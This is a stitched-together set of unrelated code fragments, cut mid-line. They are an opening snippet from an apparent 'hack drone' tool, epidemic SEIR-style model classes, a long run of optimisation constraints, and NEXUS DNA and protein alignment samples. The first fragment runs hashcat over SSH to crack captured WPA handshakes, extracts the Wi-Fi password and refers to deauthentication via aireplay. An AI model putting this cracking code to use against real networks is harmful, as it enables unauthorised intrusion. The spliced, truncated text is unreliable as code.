self.check_log_file = Path(current_path + "/data/hack_drone_log.csv")
if self.password_dictionary == True:
hashcat_command = "hashcat -a 0 -m 2500 " + self.four_way_handshake_convert_filename + " " + self.password_dictionary_filename + " --status --status-timer 1"
stdin, hashcat_running_status_return_stdout, stderr = client.exec_command(hashcat_command, get_pty = True) #get_pty > get pseudo terminal
else:
hashcat_command = "hashcat -a 3 -m 2500 " + self.four_way_handshake_convert_filename + " --status --status-timer 1"
stdin, hashcat_running_status_return_stdout, stderr = client.exec_command(hashcat_command, get_pty = True) #get_pty > get pseudo terminal
self.info_label.config(text = "Cracking password.")
for line in iter(hashcat_running_status_return_stdout.readline, ""):
print(line, end = "")
get_cracked_password = "<PASSWORD> 3 -m 2500 " + self.four_way_handshake_convert_filename + " --show" #Show crecked password
stdin, cracked_password_return_stdout, stderr = client.exec_command(get_cracked_password , get_pty = True)
for line in iter(cracked_password_return_stdout.readline, ""): #Print password
separator = ":"
get_cracked_wifi_password = separator.join(line.split(separator, 3)[-1:])
if "\r\n" in get_cracked_wifi_password:
cracked_wifi_password = get_cracked_wifi_password.strip("\r\n") #Remove trailing newline
#print(cracked_wifi_password)
elif "\n" in get_cracked_wifi_password:
cracked_wifi_password = get_cracked_wifi_password.strip("\n") #Remove trailing newline
elif "\r" in get_cracked_wifi_password:
cracked_wifi_password = get_cracked_wifi_password.strip("\r") #Remove trailing newline
else:
cracked_wifi_password = get_cracked_wifi_password
client.close() #Close SSH connection
if self.wifi_deauthentication_states == True:
find_xterm_aireplay_pid = "ps ax | grep 'xterm -iconic | |
self.labels = ['Susceptible', 'Exposed', 'Infectious']
self.colors = ['green', 'yellow', 'red']
def __repr__(self):
"""
redefine the model representation
"""
return f"Covid_SEIS(s={self.s}, e={self.e}, i={self.i})\n(lam={self.lam}, b={self.b}, k={self.k}, a={self.a}, mu={self.mu})"
def rhs(self, t, y):
"""
Define SEIR model's differential equations
"""
s_ = self.lam - self.b * y[0] * y[2] - self.mu * y[0] + self.k * y[2]
e_ = self.b * y[0] * y[2] - (self.mu + self.a) * y[1]
i_ = self.a * y[1] - (self.mu + self.k) * y[2]
return np.array([s_, e_, i_])
class MSEIR(covid):
def __init__(self, lam, sigma, b, k, a, mu, **kwargs):
"""
init MSEIR model parameters, [maternally_derived_immunity-susceptible-exposed-infectious-recovered]
dm / dt = lam - sigma * m - mu * m
ds / dt = sigma * m - mu * s - b * s * i
de / dt = b * s * i - (mu + a) * e
di / dt = a * e - (k + mu) * i
dr / dt = k * i - mu * r
Parameter
lam - birth rate of total population
sigma - the rate of changing from maternally_derived_immunity to susceptible
b - b is number of interactions per individual per day
k - k is the fraction of infectious to recovered each day (0 < k < 1)
a - 1/a is the mean incubation period of exponential distribution
mu - population decrease rate
Optional Parameter
M - maternally-derived-immunity population
S - susceptible population
E - exposed population
I - infectious population
R - recovered population
N - total population
"""
super().__init__(b, k, **kwargs)
# init model related parameters
self.lam = lam
self.sigma = sigma
self.a = a
self.mu = mu
self.M = kwargs.get('M', 0)
self.R = kwargs.get('R', 0)
self.E = kwargs.get('E', 0)
self.N = kwargs.get('N', self.S + self.I + self.R + self.E + self.M)
assert self.S + self.I + self.R + self.E + self.M == self.N, 'M+S+E+I+R should equal to N'
self.m = self.M / self.N
self.s = self.S / self.N
self.i = self.I / self.N
self.r = self.R / self.N
self.e = self.E / self.N
# redefine self.y0, self.labels, self.colors.
self.y0 = np.array([self.m, self.s, self.e, self.i, self.r])
self.labels = ['MDI', 'Susceptible', 'Exposed', 'Infectious', 'Removed']
self.colors = ['grey', 'green', 'yellow', 'red', 'blue']
def __repr__(self):
"""
redefine the model representation
"""
return f"Covid_MSEIR(m={self.m}, s={self.s}, e={self.e}, i={self.i}, r={self.r})\n(lam={self.lam}, sigma={round(self.sigma,4)}, b={self.b}, k={self.k}, a={round(self.a,4)}, mu={self.mu})"
def rhs(self, t, y):
"""
Define MSEIR model's differential equations
"""
m_ = self.lam - self.sigma * y[0] - self.mu * y[0]
s_ = self.sigma * y[0] - self.b * y[1] * y[3] - self.mu * y[1]
e_ = self.b * y[1] * y[3] - (self.mu + self.a) * y[2]
i_ = self.a * y[2] - (self.mu + self.k) * y[3]
r_ = self.k * y[3] - self.mu * y[4]
return np.array([m_, s_, e_, i_, r_])
class MSEIRS(covid):
def __init__(self, lam, sigma, b, k, a, mu, l, **kwargs):
"""
init MSEIRS model parameters, [maternally_derived_immunity-susceptible-exposed-infectious-recovered-susceptible]
dm / dt = lam - sigma * m - mu * m
ds / dt = sigma * m + l * r - mu * s - b * s * i
de / dt = b * s * i - (a + mu) * e
di / dt = a * e - (k + mu) * i
dr / dt = k * i - (l + mu) * r
Parameter
lam - birth rate of total population
sigma - the rate of changing from maternally_derived_immunity to susceptible
b - b is number of interactions per individual per day
k - k is the fraction of infectious to recovered each day (0 < k < 1)
a - 1/a is the mean incubation period of exponential distribution
mu - population decrease rate
l - temporary immunity R would become S, 1/l is the mean immunity period of exponential distribution
Optional Parameter
M - maternally-derived-immunity population
S - susceptible population
E - exposed population
I - infectious population
R - recovered population
N - total population
"""
super().__init__(b, k, **kwargs)
# init model related parameters
self.lam = lam
self.sigma = sigma
self.a = a
self.mu = mu
self.l = l
self.M = kwargs.get('M', 0)
self.R = kwargs.get('R', 0)
self.E = kwargs.get('E', 0)
self.N = kwargs.get('N', self.S + self.I + self.R + self.E + self.M)
assert self.S + self.I + self.R + self.E + self.M == self.N, 'M+S+E+I+R should equal to N'
self.m = self.M / self.N
self.s = self.S / self.N
self.i = self.I / self.N
self.r = self.R / self.N
self.e = self.E / self.N
# redefine self.y0, self.labels, self.colors.
self.y0 = np.array([self.m, self.s, self.e, self.i, self.r])
self.labels = ['MDI', 'Susceptible', 'Exposed', 'Infectious', 'Removed']
self.colors = ['grey', 'green', 'yellow', 'red', 'blue']
def __repr__(self):
"""
redefine the model representation
"""
return f"Covid_MSEIRS(m={self.m}, s={self.s}, e={self.e}, i={self.i}, r={self.r})\n" \
f"(lam={self.lam}, sigma={round(self.sigma,3)}, b={self.b}, k={self.k}, a={round(self.a,3)}, mu={self.mu}, l={round(self.l,3)})"
def rhs(self, t, y):
"""
Define MSEIR model's differential equations
"""
m_ = self.lam - self.sigma * y[0] - self.mu * y[0]
s_ = self.sigma * y[0] + self.l * y[4] - self.b * y[1] * y[3] - self.mu * y[1]
e_ = self.b * y[1] * y[3] - (self.mu + self.a) * y[2]
i_ = self.a * y[2] - (self.mu + self.k) * y[3]
r_ = self.k * y[3] - (self.mu + self.l) * y[4]
return np.array([m_, s_, e_, i_, r_])
class MSEIQRDS(covid):
def __init__(self, **kwargs):
"""
init MSEIQRSD model parameters,
[maternally_derived_immunity-susceptible-exposed-infectious-quarantine-recovered-decreased]
q percent infectious will be become quarantine, they will not spread the virus
so quarantine will not be included in the ode model,
dm / dt = lam - sigma * m - mu * m
ds / dt = sigma * m + re * r - mu * s - b * s * (1-q)i
de / dt = b * s * (1-q)i - (mu + a) * e
di / dt = a * e - (k + mu) * i - d * log(i/1-i)
dd / dt = d * log(i/1-i)
dr / dt = k * i - (mu +re) * r
Parameter
lam - birth rate of total population
sigma - the rate of changing from maternally_derived_immunity to susceptible
b - b is number of interactions per individual per day
k - k is fraction of infectious period which recovers each day (0 < k < 1)
q - quarantine rate
a - 1/a is the mean incubation period of exponential distribution
mu - population decrease rate
dr - death/decrease rate
re - re-susceotible rate
Optional Parameter
M -
S - susceptible population
E - exposed population
I - infectious population
R - recovered population
D -
N - total population
"""
# init model related parameters
# lam=3e-5, sigma=1/720, b=3, k=1/10, q=0, a=1/14, mu=3e-5, d=0.3, re=1/360,
self.parameters = {}
self.parameters['lam'] = kwargs.get('lam', 3e-5)
self.parameters['sigma'] = kwargs.get('sigma', 1/720)
self.parameters['b'] = kwargs.get('b', 3)
self.parameters['k'] = kwargs.get('k', 0.1)
self.parameters['a'] = kwargs.get('a', 1/14)
self.parameters['mu'] = kwargs.get('mu', 3e-5)
self.parameters['q'] = kwargs.get('q', 0)
self.parameters['dr'] = kwargs.get('dr', 0.3)
self.parameters['re'] = kwargs.get('re', 1/360)
self.S = kwargs.get('S', 999_995)
self.I = kwargs.get('I', 5)
self.R = kwargs.get('R', 0)
self.E = kwargs.get('E', 0)
self.M = kwargs.get('M', 0)
self.D = kwargs.get('D', 0)
self.N = kwargs.get('N', self.S + self.I + self.R + self.E + self.M + self.D)
assert self.S + self.I + self.R + self.E + self.M + self.D == self.N, 'M+S+E+I+R+D should equal to N'
self.s = kwargs.get('s', self.S / self.N)
self.i = kwargs.get('i', self.I / self.N)
self.r = kwargs.get('r', self.R / self.N)
self.e = kwargs.get('e', self.E / self.N)
self.m = kwargs.get('m', self.M / self.N)
self.d = kwargs.get('d', self.D / self.N)
self.sol = None
# redefine self.y0, self.labels, self.colors.
self.y0 = np.array([self.m, self.s, self.e, self.i, self.r, self.d])
self.labels = ['MDI', 'Susceptible', 'Exposed', 'Infectious', 'Death', 'Removed']
self.colors = ['yellow', 'green', 'grey', 'red', 'black', 'blue']
def __repr__(self):
| |
= Constraint(expr= - m.b213 + m.x1074 <= 0)
m.c1835 = Constraint(expr= - m.b214 + m.x1075 <= 0)
m.c1836 = Constraint(expr= - m.b215 + m.x1076 <= 0)
m.c1837 = Constraint(expr= - m.b216 + m.x1077 <= 0)
m.c1838 = Constraint(expr= - m.b217 + m.x1078 <= 0)
m.c1839 = Constraint(expr= - m.b218 + m.x1079 <= 0)
m.c1840 = Constraint(expr= - m.b219 + m.x1080 <= 0)
m.c1841 = Constraint(expr= - m.b220 + m.x1081 <= 0)
m.c1842 = Constraint(expr= - m.b221 + m.x1082 <= 0)
m.c1843 = Constraint(expr= - m.b222 + m.x1083 <= 0)
m.c1844 = Constraint(expr= - m.b223 + m.x1084 <= 0)
m.c1845 = Constraint(expr= - m.b224 + m.x1085 <= 0)
m.c1846 = Constraint(expr= - m.b225 + m.x1086 <= 0)
m.c1847 = Constraint(expr= - m.b226 + m.x1087 <= 0)
m.c1848 = Constraint(expr= - m.b227 + m.x1088 <= 0)
m.c1849 = Constraint(expr= - m.b228 + m.x1089 <= 0)
m.c1850 = Constraint(expr= - m.b229 + m.x1090 <= 0)
m.c1851 = Constraint(expr= - m.b230 + m.x1091 <= 0)
m.c1852 = Constraint(expr= - m.b231 + m.x1092 <= 0)
m.c1853 = Constraint(expr= - m.b232 + m.x1093 <= 0)
m.c1854 = Constraint(expr= - m.b233 + m.x1094 <= 0)
m.c1855 = Constraint(expr= - m.b234 + m.x1095 <= 0)
m.c1856 = Constraint(expr= - m.b235 + m.x1096 <= 0)
m.c1857 = Constraint(expr= - m.b236 + m.x1097 <= 0)
m.c1858 = Constraint(expr= - m.b237 + m.x1098 <= 0)
m.c1859 = Constraint(expr= - m.b238 + m.x1099 <= 0)
m.c1860 = Constraint(expr= - m.b239 + m.x1100 <= 0)
m.c1861 = Constraint(expr= - m.b240 + m.x1101 <= 0)
m.c1862 = Constraint(expr= - m.b241 + m.x1102 <= 0)
m.c1863 = Constraint(expr= - m.b242 + m.x1103 <= 0)
m.c1864 = Constraint(expr= - m.b243 + m.x1104 <= 0)
m.c1865 = Constraint(expr= - m.b244 + m.x1105 <= 0)
m.c1866 = Constraint(expr= - m.b245 + m.x1106 <= 0)
m.c1867 = Constraint(expr= - m.b246 + m.x1107 <= 0)
m.c1868 = Constraint(expr= - m.b247 + m.x1108 <= 0)
m.c1869 = Constraint(expr= - m.b248 + m.x1109 <= 0)
m.c1870 = Constraint(expr= - m.b249 + m.x1110 <= 0)
m.c1871 = Constraint(expr= - m.b250 + m.x1111 <= 0)
m.c1872 = Constraint(expr= - m.b251 + m.x1112 <= 0)
m.c1873 = Constraint(expr= - m.b252 + m.x1113 <= 0)
m.c1874 = Constraint(expr= - m.b253 + m.x1114 <= 0)
m.c1875 = Constraint(expr= - m.b254 + m.x1115 <= 0)
m.c1876 = Constraint(expr= - m.b255 + m.x1116 <= 0)
m.c1877 = Constraint(expr= - m.b256 + m.x1117 <= 0)
m.c1878 = Constraint(expr= - m.b257 + m.x1118 <= 0)
m.c1879 = Constraint(expr= - m.b258 + m.x1119 <= 0)
m.c1880 = Constraint(expr= - m.b259 + m.x1120 <= 0)
m.c1881 = Constraint(expr= - m.b260 + m.x1121 <= 0)
m.c1882 = Constraint(expr= - m.b261 + m.x1122 <= 0)
m.c1883 = Constraint(expr= - m.b262 + m.x1123 <= 0)
m.c1884 = Constraint(expr= - m.b263 + m.x1124 <= 0)
m.c1885 = Constraint(expr= - m.b264 + m.x1125 <= 0)
m.c1886 = Constraint(expr= - m.b265 + m.x1126 <= 0)
m.c1887 = Constraint(expr= - m.b266 + m.x1127 <= 0)
m.c1888 = Constraint(expr= - m.b267 + m.x1128 <= 0)
m.c1889 = Constraint(expr= - m.b268 + m.x1129 <= 0)
m.c1890 = Constraint(expr= - m.b269 + m.x1130 <= 0)
m.c1891 = Constraint(expr= - m.b270 + m.x1131 <= 0)
m.c1892 = Constraint(expr= - m.b271 + m.x1132 <= 0)
m.c1893 = Constraint(expr= - m.b272 + m.x1133 <= 0)
m.c1894 = Constraint(expr= - m.b273 + m.x1134 <= 0)
m.c1895 = Constraint(expr= - m.b274 + m.x1135 <= 0)
m.c1896 = Constraint(expr= - m.b275 + m.x1136 <= 0)
m.c1897 = Constraint(expr= - m.b276 + m.x1137 <= 0)
m.c1898 = Constraint(expr= - m.b277 + m.x1138 <= 0)
m.c1899 = Constraint(expr= - m.b278 + m.x1139 <= 0)
m.c1900 = Constraint(expr= - m.b279 + m.x1140 <= 0)
m.c1901 = Constraint(expr= - m.b280 + m.x1141 <= 0)
m.c1902 = Constraint(expr= - m.b281 + m.x1142 <= 0)
m.c1903 = Constraint(expr= - m.b282 + m.x1143 <= 0)
m.c1904 = Constraint(expr= - m.b283 + m.x1144 <= 0)
m.c1905 = Constraint(expr= - m.b284 + m.x1145 <= 0)
m.c1906 = Constraint(expr= - m.b285 + m.x1146 <= 0)
m.c1907 = Constraint(expr= - m.b286 + m.x1147 <= 0)
m.c1908 = Constraint(expr= - m.b287 + m.x1148 <= 0)
m.c1909 = Constraint(expr= - m.b288 + m.x1149 <= 0)
m.c1910 = Constraint(expr= - m.b289 + m.x1150 <= 0)
m.c1911 = Constraint(expr= - m.b290 + m.x1151 <= 0)
m.c1912 = Constraint(expr= - m.b291 + m.x1152 <= 0)
m.c1913 = Constraint(expr= - m.b292 + m.x1153 <= 0)
m.c1914 = Constraint(expr= - m.b293 + m.x1154 <= 0)
m.c1915 = Constraint(expr= - m.b294 + m.x1155 <= 0)
m.c1916 = Constraint(expr= - m.b295 + m.x1156 <= 0)
m.c1917 = Constraint(expr= - m.b296 + m.x1157 <= 0)
m.c1918 = Constraint(expr= - m.b297 + m.x1158 <= 0)
m.c1919 = Constraint(expr= - m.b298 + m.x1159 <= 0)
m.c1920 = Constraint(expr= - m.b299 + m.x1160 <= 0)
m.c1921 = Constraint(expr= - m.b300 + m.x1161 <= 0)
m.c1922 = Constraint(expr= - m.b301 + m.x1162 <= 0)
m.c1923 = Constraint(expr= - m.b302 + m.x1163 <= 0)
m.c1924 = Constraint(expr= - m.b303 + m.x1164 <= 0)
m.c1925 = Constraint(expr= - m.b304 + m.x1165 <= 0)
m.c1926 = Constraint(expr= - m.b305 + m.x1166 <= 0)
m.c1927 = Constraint(expr= - m.b306 + m.x1167 <= 0)
m.c1928 = Constraint(expr= - m.b307 + m.x1168 <= 0)
m.c1929 = Constraint(expr= - m.b308 + m.x1169 <= 0)
m.c1930 = Constraint(expr= - m.b309 + m.x1170 <= 0)
m.c1931 = Constraint(expr= - m.b310 + m.x1171 <= 0)
m.c1932 = Constraint(expr= - m.b311 + m.x1172 <= 0)
m.c1933 = Constraint(expr= - m.b312 + m.x1173 <= 0)
m.c1934 = Constraint(expr= - m.b313 + m.x1174 <= 0)
m.c1935 = Constraint(expr= - m.b314 + m.x1175 <= 0)
m.c1936 = Constraint(expr= - m.b315 + m.x1176 <= 0)
m.c1937 = Constraint(expr= - m.b316 + m.x1177 <= 0)
m.c1938 = Constraint(expr= - m.b317 + m.x1178 <= 0)
m.c1939 = Constraint(expr= - m.b318 + m.x1179 <= 0)
m.c1940 = Constraint(expr= - m.b319 + m.x1180 <= 0)
m.c1941 = Constraint(expr= - m.b320 + m.x1181 <= 0)
m.c1942 = Constraint(expr= - m.b321 + m.x1182 <= 0)
m.c1943 = Constraint(expr= - m.b322 + m.x1183 <= 0)
m.c1944 = Constraint(expr= - m.b323 + m.x1184 <= 0)
m.c1945 = Constraint(expr= - m.b324 + m.x1185 <= 0)
m.c1946 = Constraint(expr= - m.b325 + m.x1186 <= 0)
m.c1947 = Constraint(expr= - m.b326 + m.x1187 <= 0)
m.c1948 = Constraint(expr= - m.b327 + m.x1188 <= 0)
m.c1949 = Constraint(expr= - m.b328 + m.x1189 <= 0)
m.c1950 = Constraint(expr= - m.b329 + m.x1190 <= 0)
m.c1951 = Constraint(expr= - m.b330 + m.x1191 <= 0)
m.c1952 = Constraint(expr= - m.b331 + m.x1192 <= 0)
m.c1953 = Constraint(expr= - m.b332 + m.x1193 <= 0)
m.c1954 = Constraint(expr= - m.b333 + m.x1194 <= 0)
m.c1955 = Constraint(expr= - m.b334 + m.x1195 <= 0)
m.c1956 = Constraint(expr= - m.b335 + m.x1196 <= 0)
m.c1957 = Constraint(expr= - m.b336 + m.x1197 <= 0)
m.c1958 = Constraint(expr= - m.b337 + m.x1198 <= 0)
m.c1959 = Constraint(expr= - m.b338 + m.x1199 <= 0)
m.c1960 = Constraint(expr= - m.b339 + m.x1200 <= 0)
m.c1961 = Constraint(expr= - m.b340 + m.x1201 <= 0)
m.c1962 = Constraint(expr= - m.b341 + m.x1202 <= 0)
m.c1963 = Constraint(expr= - m.b342 + m.x1203 <= 0)
m.c1964 = Constraint(expr= - m.b343 + m.x1204 <= 0)
m.c1965 = Constraint(expr= - m.b344 + m.x1205 <= 0)
m.c1966 = Constraint(expr= - m.b345 + m.x1206 <= 0)
m.c1967 = Constraint(expr= - m.b346 + m.x1207 <= 0)
m.c1968 = Constraint(expr= - m.b347 + m.x1208 <= 0)
m.c1969 = Constraint(expr= - m.b348 + m.x1209 <= 0)
m.c1970 = Constraint(expr= - m.b349 + m.x1210 <= 0)
m.c1971 = Constraint(expr= - m.b350 + m.x1211 <= 0)
m.c1972 = Constraint(expr= - m.b351 + m.x1212 <= 0)
m.c1973 = Constraint(expr= - m.b352 + m.x1213 <= 0)
m.c1974 = Constraint(expr= - m.b353 + m.x1214 <= 0)
m.c1975 = Constraint(expr= - m.b354 + m.x1215 <= 0)
m.c1976 = Constraint(expr= - m.b355 + m.x1216 <= 0)
m.c1977 = Constraint(expr= - m.b356 + m.x1217 <= 0)
m.c1978 = Constraint(expr= - m.b357 + m.x1218 <= 0)
m.c1979 = Constraint(expr= - m.b358 + m.x1219 <= 0)
m.c1980 = Constraint(expr= - m.b359 + m.x1220 <= 0)
m.c1981 = Constraint(expr= - m.b360 + m.x1221 <= 0)
m.c1982 = Constraint(expr= - m.b361 + m.x1222 <= 0)
m.c1983 = Constraint(expr= - m.b362 + m.x1223 <= 0)
m.c1984 = Constraint(expr= - m.b363 + m.x1224 <= 0)
m.c1985 = Constraint(expr= - m.b364 + m.x1225 <= 0)
m.c1986 = Constraint(expr= - m.b365 + m.x1226 <= 0)
m.c1987 = Constraint(expr= - m.b366 + m.x1227 <= 0)
m.c1988 = Constraint(expr= - m.b367 + m.x1228 <= 0)
m.c1989 = Constraint(expr= - m.b368 + m.x1229 <= 0)
m.c1990 = Constraint(expr= - m.b369 + m.x1230 <= 0)
m.c1991 = Constraint(expr= - m.b370 + m.x1231 <= 0)
m.c1992 = Constraint(expr= - m.b371 + m.x1232 <= 0)
m.c1993 = Constraint(expr= - m.b372 + m.x1233 <= 0)
m.c1994 | |
CTACGCATCCTGTACCTTATAGACGAAATTAACGACCCTCACCTGACAATTAAAGCAATA
Chicken CTCCAAATCCTCTACATAATAGACGAAATCGACGAACCTGATCTCACCCTAAAAGCCATC
Human CTACGCATCCTTTACATAACAGACGAGGTCAACGATCCCTCCCTTACCATCAAATCAATT
Loach CTACGAATTCTATATCTTATAGACGAGATTAATGACCCCCACCTAACAATTAAGGCCATG
Mouse CTACGCATTCTATATATAATAGACGAAATCAACAACCCCGTATTAACCGTTAAAACCATA
Rat CTACGAATTCTATACATAATAGACGAGATTAATAACCCAGTTCTAACAGTAAAAACTATA
Seal TTACGAATCCTCTACATAATGGACGAGATCAATAACCCTTCCTTGACCGTAAAAACTATA
Whale TTACGGATCCTTTACATAATAGACGAAGTCAATAACCCCTCCCTCACTGTAAAAACAATA
Frog CTTCGTATCCTATATTTAATAGATGAAGTTAATGATCCACACTTAACAATTAAAGCAATC
Cow GGACATCAGTGATACTGAAGCTATGAGTATACAGATTATGAGGACTTAAGCTTCGACTCC
Carp GGACACCAATGATACTGAAGTTACGAGTATACAGACTATGAAAATCTAGGATTCGACTCC
Chicken GGACACCAATGATACTGAACCTATGAATACACAGACTTCAAGGACCTCTCATTTGACTCC
Human GGCCACCAATGGTACTGAACCTACGAGTACACCGACTACGGCGGACTAATCTTCAACTCC
Loach GGGCACCAATGATACTGAAGCTACGAGTATACTGATTATGAAAACTTAAGTTTTGACTCC
Mouse GGGCACCAATGATACTGAAGCTACGAATATACTGACTATGAAGACCTATGCTTTGATTCA
Rat GGACACCAATGATACTGAAGCTATGAATATACTGACTATGAAGACCTATGCTTTGACTCC
Seal GGACATCAGTGATACTGAAGCTATGAGTACACAGACTACGAAGACCTGAACTTTGACTCA
Whale GGTCACCAATGATATTGAAGCTATGAGTATACCGACTACGAAGACCTAAGCTTCGACTCC
Frog GGCCACCAATGATACTGAAGCTACGAATATACTAACTATGAGGATCTCTCATTTGACTCT
Cow TACATAATTCCAACATCAGAATTAAAGCCAGGGGAGCTACGACTATTAGAAGTCGATAAT
Carp TATATAGTACCAACCCAAGACCTTGCCCCCGGACAATTCCGACTTCTGGAAACAGACCAC
Chicken TACATAACCCCAACAACAGACCTCCCCCTAGGCCACTTCCGCCTACTAGAAGTCGACCAT
Human TACATACTTCCCCCATTATTCCTAGAACCAGGCGACCTGCGACTCCTTGACGTTGACAAT
Loach TACATAATCCCCACCCAGGACCTAACCCCTGGACAATTCCGGCTACTAGAGACAGACCAC
Mouse TATATAATCCCAACAAACGACCTAAAACCTGGTGAACTACGACTGCTAGAAGTTGATAAC
Rat TACATAATCCCAACCAATGACCTAAAACCAGGTGAACTTCGTCTATTAGAAGTTGATAAT
Seal TATATGATCCCCACACAAGAACTAAAGCCCGGAGAACTACGACTGCTAGAAGTAGACAAT
Whale TATATAATCCCAACATCAGACCTAAAGCCAGGAGAACTACGATTATTAGAAGTAGATAAC
Frog TATATAATTCCAACTAATGACCTTACCCCTGGACAATTCCGGCTGCTAGAAGTTGATAAT
Cow CGAGTTGTACTACCAATAGAAATAACAATCCGAATGTTAGTCTCCTCTGAAGACGTATTA
Carp CGAATAGTTGTTCCAATAGAATCCCCAGTCCGTGTCCTAGTATCTGCTGAAGACGTGCTA
Chicken CGCATTGTAATCCCCATAGAATCCCCCATTCGAGTAATCATCACCGCTGATGACGTCCTC
Human CGAGTAGTACTCCCGATTGAAGCCCCCATTCGTATAATAATTACATCACAAGACGTCTTG
Loach CGAATGGTTGTTCCCATAGAATCCCCTATTCGCATTCTTGTTTCCGCCGAAGATGTACTA
Mouse CGAGTCGTTCTGCCAATAGAACTTCCAATCCGTATATTAATTTCATCTGAAGACGTCCTC
Rat CGGGTAGTCTTACCAATAGAACTTCCAATTCGTATACTAATCTCATCCGAAGACGTCCTG
Seal CGAGTAGTCCTCCCAATAGAAATAACAATCCGCATACTAATCTCATCAGAAGATGTACTC
Whale CGAGTTGTCTTACCTATAGAAATAACAATCCGAATATTAGTCTCATCAGAAGACGTACTC
Frog CGAATAGTAGTCCCAATAGAATCTCCAACCCGACTTTTAGTTACAGCCGAAGACGTCCTC
Cow CACTCATGAGCTGTGCCCTCTCTAGGACTAAAAACAGACGCAATCCCAGGCCGTCTAAAC
Carp CATTCTTGAGCTGTTCCATCCCTTGGCGTAAAAATGGACGCAGTCCCAGGACGACTAAAT
Chicken CACTCATGAGCCGTACCCGCCCTCGGGGTAAAAACAGACGCAATCCCTGGACGACTAAAT
Human CACTCATGAGCTGTCCCCACATTAGGCTTAAAAACAGATGCAATTCCCGGACGTCTAAAC
Loach CACTCCTGGGCCCTTCCAGCCATGGGGGTAAAGATAGACGCGGTCCCAGGACGCCTTAAC
Mouse CACTCATGAGCAGTCCCCTCCCTAGGACTTAAAACTGATGCCATCCCAGGCCGACTAAAT
Rat CACTCATGAGCCATCCCTTCACTAGGGTTAAAAACCGACGCAATCCCCGGCCGCCTAAAC
Seal CACTCATGAGCCGTACCGTCCCTAGGACTAAAAACTGATGCTATCCCAGGACGACTAAAC
Whale CACTCATGGGCCGTACCCTCCTTGGGCCTAAAAACAGATGCAATCCCAGGACGCCTAAAC
Frog CACTCGTGAGCTGTACCCTCCTTGGGTGTCAAAACAGATGCAATCCCAGGACGACTTCAT
Cow CAAACAACCCTTATATCGTCCCGTCCAGGCTTATATTACGGTCAATGCTCAGAAATTTGC
Carp CAAGCCGCCTTTATTGCCTCACGCCCAGGGGTCTTTTACGGACAATGCTCTGAAATTTGT
Chicken CAAACCTCCTTCATCACCACTCGACCAGGAGTGTTTTACGGACAATGCTCAGAAATCTGC
Human CAAACCACTTTCACCGCTACACGACCGGGGGTATACTACGGTCAATGCTCTGAAATCTGT
Loach CAAACCGCCTTTATTGCCTCCCGCCCCGGGGTATTCTATGGGCAATGCTCAGAAATCTGT
Mouse CAAGCAACAGTAACATCAAACCGACCAGGGTTATTCTATGGCCAATGCTCTGAAATTTGT
Rat CAAGCTACAGTCACATCAAACCGACCAGGTCTATTCTATGGCCAATGCTCTGAAATTTGC
Seal CAAACAACCCTAATAACCATACGACCAGGACTGTACTACGGTCAATGCTCAGAAATCTGT
Whale CAAACAACCTTAATATCAACACGACCAGGCCTATTTTATGGACAATGCTCAGAGATCTGC
Frog CAAACATCATTTATTGCTACTCGTCCGGGAGTATTTTACGGACAATGTTCAGAAATTTGC
Cow GGGTCAAACCACAGTTTCATACCCATTGTCCTTGAGTTAGTCCCACTAAAGTACTTTGAA
Carp GGAGCTAATCACAGCTTTATACCAATTGTAGTTGAAGCAGTACCTCTCGAACACTTCGAA
Chicken GGAGCTAACCACAGCTACATACCCATTGTAGTAGAGTCTACCCCCCTAAAACACTTTGAA
Human GGAGCAAACCACAGTTTCATGCCCATCGTCCTAGAATTAATTCCCCTAAAAATCTTTGAA
Loach GGAGCAAACCACAGCTTTATACCCATCGTAGTAGAAGCGGTCCCACTATCTCACTTCGAA
Mouse GGATCTAACCATAGCTTTATGCCCATTGTCCTAGAAATGGTTCCACTAAAATATTTCGAA
Rat GGCTCAAATCACAGCTTCATACCCATTGTACTAGAAATAGTGCCTCTAAAATATTTCGAA
Seal GGTTCAAACCACAGCTTCATACCTATTGTCCTCGAATTGGTCCCACTATCCCACTTCGAG
Whale GGCTCAAACCACAGTTTCATACCAATTGTCCTAGAACTAGTACCCCTAGAAGTCTTTGAA
Frog GGAGCAAACCACAGCTTTATACCAATTGTAGTTGAAGCAGTACCGCTAACCGACTTTGAA
Cow AAATGATCTGCGTCAATATTA---------------------TAA
Carp AACTGATCCTCATTAATACTAGAAGACGCCTCGCTAGGAAGCTAA
Chicken GCCTGATCCTCACTA------------------CTGTCATCTTAA
Human ATA---------------------GGGCCCGTATTTACCCTATAG
Loach AACTGGTCCACCCTTATACTAAAAGACGCCTCACTAGGAAGCTAA
Mouse AACTGATCTGCTTCAATAATT---------------------TAA
Rat AACTGATCAGCTTCTATAATT---------------------TAA
Seal AAATGATCTACCTCAATGCTT---------------------TAA
Whale AAATGATCTGTATCAATACTA---------------------TAA
Frog AACTGATCTTCATCAATACTA---GAAGCATCACTA------AGA
;
End;
"""
# This example uses amino acids, from here:
# http://www.molecularevolution.org/resources/fileformats/
nxs_example3 = \
"""#NEXUS
Begin data;
Dimensions ntax=10 nchar=234;
Format datatype=protein gap=- interleave;
Matrix
Cow MAYPMQLGFQDATSPIMEELLHFHDHTLMIVFLISSLVLYIISLMLTTKLTHTSTMDAQE
Carp MAHPTQLGFKDAAMPVMEELLHFHDHALMIVLLISTLVLYIITAMVSTKLTNKYILDSQE
Chicken MANHSQLGFQDASSPIMEELVEFHDHALMVALAICSLVLYLLTLMLMEKLS-SNTVDAQE
Human MAHAAQVGLQDATSPIMEELITFHDHALMIIFLICFLVLYALFLTLTTKLTNTNISDAQE
Loach MAHPTQLGFQDAASPVMEELLHFHDHALMIVFLISALVLYVIITTVSTKLTNMYILDSQE
Mouse MAYPFQLGLQDATSPIMEELMNFHDHTLMIVFLISSLVLYIISLMLTTKLTHTSTMDAQE
Rat MAYPFQLGLQDATSPIMEELTNFHDHTLMIVFLISSLVLYIISLMLTTKLTHTSTMDAQE
Seal MAYPLQMGLQDATSPIMEELLHFHDHTLMIVFLISSLVLYIISLMLTTKLTHTSTMDAQE
Whale MAYPFQLGFQDAASPIMEELLHFHDHTLMIVFLISSLVLYIITLMLTTKLTHTSTMDAQE
Frog MAHPSQLGFQDAASPIMEELLHFHDHTLMAVFLISTLVLYIITIMMTTKLTNTNLMDAQE
Cow VETIWTILPAIILILIALPSLRILYMMDEINNPSLTVKTMGHQWYWSYEYTDYEDLSFDS
Carp IEIVWTILPAVILVLIALPSLRILYLMDEINDPHLTIKAMGHQWYWSYEYTDYENLGFDS
Chicken VELIWTILPAIVLVLLALPSLQILYMMDEIDEPDLTLKAIGHQWYWTYEYTDFKDLSFDS
